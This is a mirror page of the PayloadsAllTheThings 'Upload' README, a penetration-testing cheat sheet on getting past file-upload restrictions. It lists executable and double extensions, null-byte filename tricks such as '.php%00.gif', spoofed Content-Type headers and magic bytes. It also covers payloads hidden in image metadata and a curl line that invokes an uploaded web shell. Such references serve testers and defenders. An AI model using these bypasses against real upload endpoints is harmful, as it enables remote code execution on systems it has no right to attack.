mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00

History

vict0ni 7b8514f1f5 Update README.md Added "adding magic bytes" solution		2020-05-14 00:09:30 +02:00
..
Configuration Apache .htaccess	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Configuration Busybox httpd.conf	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Configuration IIS web.config	Create web.web.config	2020-04-08 19:14:30 +02:00
Configuration Python __init__.py	Fix name's capitalization	2019-03-07 00:07:55 +01:00
CVE Ffmpeg HLS	Fix name's capitalization	2019-03-07 00:07:55 +01:00
CVE ZIP Symbolic Link	Fix name's capitalization	2019-03-07 00:07:55 +01:00
EICAR	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Extension ASP	IIS asp shell with .asa, .cer, .xamlx	2019-11-16 14:53:42 +01:00
Extension Flash	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Extension HTML	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Extension PDF JS	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Extension PHP	PrivEsc - sudoers + Upload PHP	2019-09-02 12:36:40 +02:00
Picture Image Magik	CVE-2019-1322 UsoSvc	2019-11-11 20:31:07 +01:00
Picture Metadata	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Picture Resize	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Server Side Include	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Zip Slip	Update and rename ReadMe.txt to README.md	2019-10-30 12:07:50 +08:00
README.md	Update README.md	2020-05-14 00:09:30 +02:00

README.md

Upload

Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Tools

Fuxploider

Exploits

PHP Extension

.php
.php3
.php4
.php5
.php7

Less known extensions
.pht
.phar
.phpt
.pgif
.phtml
.phtm

Double extensions
.jpeg.php
.jpg.php
.png.php

Other extensions

asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm

Upload tricks

Null byte (works well against pathinfo())
- .php%00.gif
- .php\x00.gif
- .php%00.png
- .php\x00.png
- .php%00.jpg
- .php\x00.jpg
Mime type, change Content-Type : application/x-php or Content-Type : application/octet-stream to Content-Type : image/gif
- Content-Type : image/gif
- Content-Type : image/png
- Content-Type : image/jpeg
Magic Bytes Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.

Picture upload with LFI

Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : curl 'http://localhost/test.php?0=system' --data "1='ls'".

Picture Metadata, hide the payload inside a comment tag in the metadata.
Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating getimagesize() and imagecreatefromgif().

Configuration Files

.htaccess
web.config
httpd.conf
__init__.py

CVE - Image Tragik

HTTP Request
Reverse Shell
Touch command

References

Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA
Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil
La PNG qui se prenait pour du PHP, 23 février 2014
File Upload restrictions bypass - Haboob Team